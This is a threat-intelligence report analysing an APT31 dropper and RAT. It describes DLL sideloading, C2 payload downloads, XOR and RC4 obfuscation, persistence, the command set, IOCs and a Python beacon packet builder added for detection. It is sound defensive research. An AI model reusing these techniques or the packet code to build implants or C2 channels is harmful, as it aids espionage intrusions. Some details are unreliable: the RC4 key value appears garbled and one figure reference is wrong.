APT31 new dropper. Target destinations: Mongolia, Russia, the U.S., and elsewhere 




Published on 3 August 2021 


Introduction 




During such monitoring in April 2021, a mailing with previously unknown malicious content was sent to Mongolia. Some of the files found during the study had rather interesting names ("хавсралт.scr", transliterated "havsralt.scr", Mongolian for "attachment", and a Russian-language executable rendered on the page as "MHdopmauna PO uronHb 2021 roga_ 2021062826109.exe") and, as the study showed, they contained a remote access trojan (RAT). Similar attacks were subsequently identified in Russia, Belarus, Canada, and the United States. According to PT ESC threat intelligence analysts, from January to July 2021, approximately 10 attacks were carried out using the discovered malware samples. A detailed analysis of the malware samples, the paths of the working directories and registry keys, and the techniques and mechanisms used by the attackers (from the injection of malicious code to the logical blocks and structures used) helped correlate this malware with the activity of the APT31 group.





This group, also known as Judgment Panda (CrowdStrike) and Zirconium (Microsoft), has been active since at least 2016. Cyberespionage is its key interest. The attackers' targets include the government sector, aerospace and defense enterprises, as well as international financial companies and the high-tech sector. In different years, the group's victims have included [...] and, it is presumed, [...] too. The group also attacked organizations and individuals close to U.S. presidential candidates during the 2020 campaign. [...], involving the hacking of home and office routers, have also been linked with the group.


In this article, we will study the malware created by the group, focus in more detail on the types of droppers discovered and the tricks used by its developers. We will also 
present the criteria on the basis of which the attacks were attributed. 


Analysis of malicious content 


Dropper 


The main objective of the dropper, whose main function is shown in Figure 1, is the creation of two files on the infected computer: a malicious library and an application vulnerable to DLL sideloading (this application is then launched). Both files are always created in the same path, C:\ProgramData\Apacha. If this directory is absent, it is created and the process is restarted.


[Figure 1 is a decompiler screenshot. Recoverable content: the function looks for the sideload application with FindFirstFileA and for the C:\ProgramData\Apacha directory; if the directory is missing it calls CreateDirectoryA, writes the sideload application and the malicious library with CreateFileA/WriteFile/CloseHandle, obtains the active console session with WTSGetActiveConsoleSessionId and WTSQueryUserToken, re-launches its own image via GetModuleFileNameA and WinExec, and returns 1; otherwise it starts the sideload application with CreateProcessA and waits on the resulting handle with WaitForSingleObject.]
Figure 1. Overview of the dropper's basic function 


At the second stage, the application launched by the dropper loads the malicious library and calls one of its functions. It is noteworthy that MSVCR100.dll was chosen as the name of the malicious library in all cases. A library with an identical name is included in Visual C++ for Microsoft Visual Studio. It is available on almost all PCs, but in the legitimate case it is located in the System32 folder (Figure 2). Moreover, the malicious library is much smaller than the legitimate one.


msvcr100.dll; modified: 25.10.2016 19:27; location: C:\Windows\System32; type: application extension; size: 311 KB


Figure 2. Parameters of the legitimate MSVCR100.dIl 


It is also worth noting a trick of the malware developers: the library exports names that can be found in the legitimate MSVCR100.dll. Without a doubt, this was done to make the malicious library look as much like the original as possible.




[Figure 3 is a screenshot of the export table. Recoverable content: export names copied from the legitimate runtime, among them __argc, __dllonexit, __set_app_type, __setusermatherr, __wargv, __wgetmainargs, _cexit, _commode, _configthreadlocale, _controlfp_s, _crt_debugger_hook, _except_handler4_common, _exit, _fmode, _ftime64_s, _initterm, _initterm_e, _invoke_watson, _localtime64, _lock, _onexit, _recalloc, _unlock, _vsnwprintf_s, _wcmdln, _wdupenv_s, _wfopen_s, _wputenv, _wsplitpath_s and _wstat64i32, almost all of which resolve to the same address, 10001010.]
Figure 3. Part of the exports of malicious MSVCR100.dll 
However, the number of exports in the malicious sample is much smaller, and most of them are ExitProcess calls. 


Below is an example of a call to a malicious function from the created library. After the call, control is transferred to the malicious code. Note that the names of malicious 
functions were most often those used during the regular loading of applications. 


[Figure 4 is a disassembly screenshot. Recoverable content: in the legitimate application, _initterm_e (int __cdecl _initterm_e(_PIFV *First, _PIFV *Last)) is a jmp through the import thunk __imp___initterm_e, which is defined as dd offset msvcr100__initterm_e, i.e. the export of the sideloaded MSVCR100.dll.]
Figure 4. Calling a malicious function inside a legitimate application 


During the analysis of malware samples, PT ESC specialists detected different versions of droppers that contain the same set of functions. The main difference is the name 
of the directory in which the files contained in the dropper will be created. However, in all the instances studied, the directories found in C:\ProgramData\ were used. 


The version of the dropper that downloads all files from the control server is worthy of particular note. Let's take a closer look. At the first stage, the presence of a 
working directory is also checked, after which connection is made to the control server and the necessary data is downloaded from it. 


[Figure 5 is a decompiler screenshot. Recoverable content: the function calls FindFirstFileW(L"C:\\ProgramData\\dotixtray", ...); if the result is (HANDLE)-1 it calls FindClose and returns !CreateDirectoryW(L"C:\\ProgramData\\dotixtray", 0); otherwise it calls FindClose on the search handle and returns 2.]
Figure 5. Checking for a directory 


Communication with the server is not encrypted in any way, nor is the control server's address inside the malware. Downloaded files are written to the created working 
directory. 




[Figure 6 is a decompiler screenshot. Recoverable content: three CreateFileA/WriteFile/CloseHandle sequences write the downloaded data (lpBuffer and two further offsets into the received buffer) into files in the working directory.]
Figure 6. Creating files in the working directory 


Figure 7 displays the code sections responsible for downloading all files from the server (the last reviewed case), while Figure 8 displays the code for loading the main 
library (first instance). 


[Figure 7 is a decompiler screenshot. Recoverable content: HttpOpenRequestA; when UrlComponents.nScheme == INTERNET_SCHEME_HTTPS the code reads option 0x1F (INTERNET_OPTION_SECURITY_FLAGS) with InternetQueryOptionA, ORs 0x100 into it and writes it back with InternetSetOptionW; HttpSendRequestA; HttpQueryInfoA to obtain the content length, then malloc(Size); a loop of InternetReadFile into pReadData with memmove into the allocated buffer until dwNumberOfBytesRead is zero and the whole size has arrived; finally InternetCloseHandle on the request, connection and session handles.]
Figure 7. Downloading files from C2 




[Figure 8 is a decompiler screenshot. Recoverable content: the same HttpOpenRequestA / INTERNET_SCHEME_HTTPS / InternetQueryOptionA / InternetSetOptionA (option 0x1F |= 0x100) / HttpSendRequestA / HttpQueryInfoA sequence as in Figure 7, but the response is written straight to disk: CreateFileA opens hFile and each InternetReadFile chunk (pDownloadBuff) is passed to WriteFile(hFile, pDownloadBuff, dwNumberOfBytesRead, &NumberOfBytesWritten, 0) until the expected length has arrived; CloseHandle and InternetCloseHandle on the request, connection and session follow, and the function returns 0.]
Figure 8. Downloading a malicious library from C2 


Examining the open directories of control servers revealed unencrypted libraries (Figure 9). 


Index of /download

Name             Last modified       Size
Parent Directory
image9588.jpg    2021-03-24 10:27    366K
update.dll       2021-03-24 06:32    366K

Apache/2.4.29 (Ubuntu) Server at www.flushcdn.com Port 443


Figure 9. Encrypted and unencrypted libraries on the server 







It is also worth noting that in some cases, particularly during attacks on Mongolia, the dropper was signed with a valid digital signature (Figure 10). PT ESC experts believe that this signature was most likely stolen.







[Figure 10 is a screenshot of the Windows "Digital Signature Details" dialog. Recoverable content: "This digital signature is OK"; signer e-mail michael@softwareconcepts.nz; signing time Monday, April 19, 2021 11:20:28 AM; countersignature by DigiCert Timestamp, dated Monday, April 19, 2021.]
Figure 10. Valid digital signature of a dropper


Malicious library


Execution begins by obtaining a list of running processes; however, the result has no effect on anything and is not used anywhere. The library then checks for the presence of the file C:\ProgramData\Apacha\ssvagent.dll. This is the encrypted main payload downloaded from the server. If this file does not exist, the address of the control server from which the download will be performed is decrypted.


This is a 5-byte XOR with a key built into the library. Inside the binary, the key is stored as an xmmword with the constant 9000000090000000900000009h (the fifth byte is written into memory by the malware itself by direct address). Since every key byte is the same, the encryption is effectively a single-byte XOR with 0x9. After decrypting the C2 address, the library connects to the control server and downloads the encrypted payload from it. The received data is saved to the file C:\ProgramData\Apacha\ssvagent.dll, and the legitimate application ssvagent.exe is restarted. The main part of the described functions is presented in Figure 11.


[Figure 11 is a decompiler screenshot. Recoverable content: the bytes of pUrlEncrypted[...] are XOR-decrypted in place, after which fnPayloadDownload() is called and its return value checked for failure.]
Figure 11. Decrypting the C2 address, loading and launching a new instance of ssvagent.exe 


If the payload has already been downloaded, the library checks whether an instance of the application is already running. To do this, a mutex named ssvagent is created; if it already exists, the application exits.


The library then writes the legitimate ssvagent.exe to startup via the registry, as shown in Figure 12. 







Figure 12. Persistence via registry key 


After this, the file downloaded from the server is decrypted using an XOR operation with a 5-byte key. (The algorithm and key shown in Figure 10 differ from those used when decrypting the address of the control server.) Just as for the control server address, the key is stored as an xmmword constant: 1100000033000000060000000Eh. The fifth byte is identical in all cases; its value is 0x12.


[Figure 13 is a decompiler screenshot; the recoverable line is the call fnLoadBinaryInMem(v5, ...).]


Figure 13. Decryption code of the main library 


After this, the decrypted data is placed in the application memory, and control is transferred to it.


Payload


The main library starts its execution by creating a package that will be sent to the server. The package can be viewed as consisting of three parts:


1. Main heading 
2. Hash 
3. Encrypted data 


The main heading has the following structure: 


typedef struct _MAIN_HEADER
{
    DWORD sizeOfPacket; // excluding the field itself
    DWORD const_1;
    DWORD const_2;
} MAIN_HEADER, *PMAIN_HEADER;


The values of const_1 and const_2 are identical and remain unchanged from package to package (the value 1, stored as a 4-byte DWORD).


To generate the hash that follows the main heading, the malware obtains the MAC address and the PC name (the result of GetComputerNameExW). These values are concatenated (without any separator), an MD5 hash is taken of the result, and the hash is converted into a string. An example of hash generation is presented in Figure 14.


Figure 14. Example of hash generation 





The third part of the package is then formed. The structure describing it is presented below:


typedef struct _FIRST_PACKET
{
    char pcName[];           // result of GetComputerNameExW
    BYTE splitByte_0x09;
    char userName[];         // result of GetUserNameW
    BYTE splitByte_0x09;
    char hostIp[];
    BYTE splitByte_0x09;
    char decrStr_1[2];
    BYTE splitByte_0x2E;
    char decrStr_2[1];
    BYTE splitByte_0x2E;
    char decrStr_3[5];
    BYTE splitByte_0x2E;
    char decrStr_4[2];
    BYTE splitByte_0x2E;
    char osVersion_inverted[2];
    BYTE splitByte_0x09;
    char version[3];
    BYTE splitByte_0x09;
    char macAddr[];
    BYTE splitByte_0x09;
} FIRST_PACKET, *PFIRST_PACKET;


Each field is separated from the other by a value of 0x09; some fields are separated by a value of 0x2E. 


[Figure 15 is a hex dump of a generated package. Recoverable fragments: tab-separated (0x09) fields, a dotted string ending in the version value 1.0, and a MAC address of the form 00-FF-..-7D-C6-DB.]
Figure 15. An example of a generated package 


The fields decrStr_1 through decrStr_4 are not generated by the malware and are not collected on the infected computer. All four values are stored encrypted inside the malware. Each value is decrypted separately and added to the heading. The decrStr_4 field depends on the bitness of the operating system, which results in different offsets of the encrypted data being passed as an argument to the decryption function (Figure 17).


The format of a complete generated package is presented below. The main heading is highlighted in green; the hash, in red; the encrypted data, in yellow. 


[Figure 16 is a hex dump of the complete packet with the three parts colour-coded; the bytes are not recoverable from the page.]
Figure 16. Encrypted package with all headings 


[Figure 17 is a decompiler screenshot; the recoverable line is a call to init_string(...).]
Figure 17. Decrypting data from a specific position within a binary file 


The generated package is encrypted with RC4 using the key 0x16CCA8I1F, which is embedded in the encrypted data, and is sent to the server. After this, the malware waits for commands from the server.
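A builder and parser for the first packet described above (MAIN_HEADER, MD5 string, RC4-encrypted tab-separated body), as an added example that is not the malware's or PT ESC's code. It assumes that sizeOfPacket counts every byte after the size field, that const_1 = const_2 = 1, that the MD5 input is ASCII, and uses a constructed placeholder RC4 key rather than the article's key; looks_like_beacon is the key-independent structural check a traffic rule would start from.

```python
"""First-beacon packet of the APT31 payload described above: builder and parser.

Added example, not the malware's or PT ESC's code.  Assumptions: sizeOfPacket
counts every byte after the size field itself, const_1 == const_2 == 1, MD5 is
taken over ASCII MAC+name, and RC4_KEY is a constructed placeholder DWORD
(the article's key is not reproduced here), packed little-endian.
"""
import hashlib
import struct
from typing import Dict, List

HEADER_CONST = 1                          # assumed: const_1 == const_2 == 1
RC4_KEY = struct.pack("<I", 0x11223344)   # constructed placeholder, not the real key
TAB, DOT = b"\x09", b"\x2E"               # separators from _FIRST_PACKET


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); one function both encrypts and decrypts."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def victim_hash(mac: str, pc_name: str) -> str:
    """MD5 of MAC address + computer name, concatenated with no separator."""
    return hashlib.md5((mac + pc_name).encode("ascii")).hexdigest()


def build_body(pc_name: str, user_name: str, host_ip: str, decr: List[str],
               os_version: str, version: str, mac: str) -> bytes:
    """Plaintext third part, following _FIRST_PACKET: decrStr_1..4 are joined
    by 0x2E and run straight into osVersion_inverted; all other fields by 0x09."""
    if len(decr) != 4:
        raise ValueError("decrStr_1..decrStr_4 expected")
    dotted = DOT.join(s.encode() for s in decr) + DOT + os_version.encode()
    fields = [pc_name.encode(), user_name.encode(), host_ip.encode(),
              dotted, version.encode(), mac.encode()]
    return TAB.join(fields) + TAB


def build_packet(body: bytes, mac: str, pc_name: str, key: bytes = RC4_KEY) -> bytes:
    """MAIN_HEADER + hash string + RC4(body)."""
    enc = rc4(key, body)
    h = victim_hash(mac, pc_name).encode("ascii")
    size = 8 + len(h) + len(enc)          # bytes after sizeOfPacket (assumption)
    return struct.pack("<III", size, HEADER_CONST, HEADER_CONST) + h + enc


def looks_like_beacon(data: bytes) -> bool:
    """Key-independent structural check: size field consistent with the packet
    length, equal constants, 32 lowercase hex characters where the hash sits."""
    if len(data) < 44:
        return False
    size, c1, c2 = struct.unpack_from("<III", data, 0)
    if size != len(data) - 4 or c1 != c2:
        return False
    return all(ch in b"0123456789abcdef" for ch in data[12:44])


def parse_packet(data: bytes, key: bytes = RC4_KEY) -> Dict[str, object]:
    """Decrypt and split a packet; raises ValueError on a malformed one."""
    if not looks_like_beacon(data):
        raise ValueError("not a beacon packet")
    parts = rc4(key, data[44:]).split(TAB)
    if len(parts) != 7 or parts[-1] != b"":
        raise ValueError("unexpected field count (wrong key?)")
    pc, user, ip, dotted, ver, mac = parts[:6]
    d = dotted.split(DOT)                 # decrStr_1..4 + osVersion_inverted
    if len(d) != 5:
        raise ValueError("unexpected dotted field")
    return {"hash": data[12:44].decode(), "pc_name": pc.decode(),
            "user": user.decode(), "host_ip": ip.decode(),
            "decr": [x.decode() for x in d[:4]], "os_version": d[4].decode(),
            "version": ver.decode(), "mac": mac.decode()}


if __name__ == "__main__":
    mac, pc = "00-11-22-33-44-55", "DESKTOP-TEST"          # constructed values
    body = build_body(pc, "alice", "10.0.0.5", ["ab", "c", "defgh", "ij"], "16", "1.0", mac)
    print(parse_packet(build_packet(body, mac, pc)))
```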


Let's take a look at the list of commands that the malware implements: 


• 0x3: get information on mapped drives.
• 0x4: perform a file search.
• 0x5: create a process, communicating with it through a pipe.
• 0xA: create a process via ShellExecute.
• 0xC: create a new thread that downloads a file from the server.
• 0x6, 0x7, 0x8, 0x9 (identical): search for a file or perform the requested operation via SHFileOperationW (copy file, move file, rename file, delete file).
• 0xB: create a directory.
• 0xD: create a new thread that sends a file to the server.
• 0x11: self-delete.


It is noteworthy that some of them duplicate each other's functions, and some are identical in terms of code implementation. This is most likely connected with the fact 
that the potential malware version is 1.0. This assumption is based on the value embedded in the code and contained in the network packages. 


The code for processing the last command is particularly intriguing: all the created files and registry keys are deleted using a bat-file. 


[Figure 18 is a screenshot of the code that builds and runs the deletion bat-file; its text is not recoverable from the page.]
Figure 18. Code for removing all components 


Attribution 


During their investigation, PT ESC specialists found a Secureworks report describing the APT31 DropboxAES RAT trojan. Analysis of the detected malware instances allows us to assert that the group is also behind the attack we studied. Numerous overlaps were found in the functionality, techniques and mechanisms used, from the injection of malicious code (down to the names of the libraries used) to the logical blocks and structures used inside the program code. The paths of the malware working directories and the registry keys that provide persistence (whose names match those working directories) are also identical. In addition, the command handlers executed by the malware proved to be extremely similar, while the self-delete mechanism is identical.


The main difference between this version of the malware and the one reviewed by Secureworks lies in how the main payload communicates with the control server. In the cases studied, a custom communication protocol was used, and Dropbox was not used to exchange data.


Network infrastructure 


The detected malware samples, including the encrypted ones, revealed no overlaps between them in the network infrastructure. Nevertheless, in several cases, the payload 
accessed nodes other than those from which it was downloaded. 


[Figure 19 is a graph of the identified servers, domains and sample hashes; its values are not recoverable from the page.]
Figure 19. Identified servers 


In one of the latest malware samples, an interesting domain, inst.rsnet-devel[.]com, was identified. It imitates the domain of the Internet segment used by federal government bodies and government bodies of the constituent entities of the Russian Federation. This might indicate an attack on government organizations in the Russian Federation.


Authors: Denis Kuvshinov, Daniil Koloskov, PT ESC 


Conclusion 


In the study PT ESC specialists analyzed new versions of the malware used by APT31 in attacks from January to July this year. The revealed similarities with earlier 
versions of malicious samples described by researchers, such as in 2020, suggest that the group is expanding the geography of its interests to countries where its growing 
activity can be detected, Russia in particular. We believe that further instances will be revealed soon of this group being used in attacks, including against Russia, along 
with other tools that might be identified by code correspondence or network infrastructure. 


IOCs 

File hashes (MD5, SHA-1, SHA-256) were published for the following samples; the hash columns are not reproduced here.

Dropper: jconsole.exe, news.exe, president_email.exe, хавсралт.scr, the Russian-language executable named in the introduction, and four further unnamed droppers.

Malicious library: three MSVCR100.dll samples.




Network indicators 


gitcloudcache[.]com
edgecloudc[.]com
api[.]hostupoeui[.]com
api[.]flushcdn[.]com
const[.]be-government[.]com
drmtake[.]tk
inst[.]rsnet-devel[.]com
20[.]11[.]11[.]67


Network signature 


As a result of researching the format of the complete generated packet, Positive Technologies experts managed to develop rules for detecting this threat in network traffic. 
You can download the free redistributable rules from our repository at https://github.com/ptresearch/AttackDetection/tree/master/APT31 


MITRE


ID | Name | Description

Resource Development
T1587.001 | Develop Capabilities: Malware | APT31 develops malware and malware components that can be used during targeting
T1587.002 | Develop Capabilities: Code Signing Certificates | APT31 uses code signing to sign their malware and tools

Initial Access
T1566 | Phishing | APT31 sends phishing messages to gain access to victim systems

Execution
T1204.002 | User Execution: Malicious File | APT31 relies upon a user opening a malicious file to get it executed
T1059.003 | Command and Scripting Interpreter: Windows Command Shell | APT31 uses the Windows command shell for command execution
T1106 | Native API | APT31 directly interacts with the native OS application programming interface (API) to execute behaviors

Persistence
T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | APT31 achieves persistence by adding a program to a Registry run key
T1574 | Hijack Execution Flow: DLL Search Order Hijacking | APT31 executes their own malicious payloads by hijacking the way operating systems run programs

Defense Evasion
T1036 | Masquerading | APT31 manipulates features of their artifacts to make them appear legitimate to users
T1140 | Deobfuscate/Decode Files or Information | APT31 uses mechanisms to decode or deobfuscate information
T1027 | Obfuscated Files or Information | APT31 uses encryption to make it difficult to detect or analyze an executable file
T1112 | Modify Registry | APT31 uses the Windows registry for persistence

Discovery
T1082 | System Information Discovery | APT31 obtains detailed information about the operating system

Collection
T1005 | Data from Local System | APT31 uses backdoor functionality to exfiltrate any file on the infected machine

Command and Control
T1001 | Data Obfuscation | APT31 obfuscates command and control traffic to make it more difficult to detect
T1032 | Standard Cryptographic Protocol | APT31 uses data hiding in C&C with RC4
T1043 | Commonly Used Port | APT31 uses ports 80 and 443 for communication
T1071.001 | Application Layer Protocol: Web Protocols | APT31 uses HTTP and HTTPS protocols to communicate with control servers

Exfiltration
T1020 | Automated Exfiltration | APT31 uses automatic exfiltration of stolen files
T1041 | Exfiltration Over C2 Channel | APT31 uses the C&C channel to exfiltrate data


Copyright © 2002-2021 Positive Technologies